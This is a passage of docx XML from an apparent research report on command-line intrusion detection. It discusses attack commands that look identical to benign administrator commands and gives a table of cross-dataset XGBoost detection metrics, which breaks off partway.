        <w:t xml:space="preserve">content at all — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apparmor_parser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>aptitude changelog aptitude</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nano u.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls -1 /etc/pam.d</w:t>
      </w:r>
      <w:r>
        <w:t>. There is no feature, engineered or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">learned, that separates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> typed by an intruder from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> typed by an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>administrator, because the strings are identical and the intent is not in the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">artefact. This is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>unlearnable overlap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> named as failure mode 1 in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 1.1, now counted: it accounts for 11.0% of Dataset 1's test attacks and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>12.9% of Dataset 2's, and it is the ceiling that no amount of modelling in this</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>project can raise. Lifting it requires telemetry this project deliberately does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>not use — process ancestry, session context, timing — and that boundary is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>scoping decision recorded in Chapter 1.1, not a defect to be tuned away. It is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the single most useful thing to hand to future work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.2 — Cross-dataset variance (all 5 registry models)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>In-distribution (train and test on the same dataset's splits) and cross-dataset transfer. Diagonal = in-distribution; off-diagonal = transfer. Metrics at threshold 0.5.</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before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>train → test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Accuracy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Precision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recall/DR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ROC-AUC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset1 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.893</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.785</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.786</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.072</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.786</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.932</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset2 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.662</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.395</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.662</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.338</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.495</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.722</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset1 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.750</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.154</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.051</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.235</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.597</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset2 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.878</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.756</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.756</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.081</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.756</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.930</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost_hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset1 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.938</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.875</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.877</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.042</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.876</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.979</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost_hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset2 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.709</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.662</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.276</w:t>
            </w:r>
          </w:p>
        </w:tc>
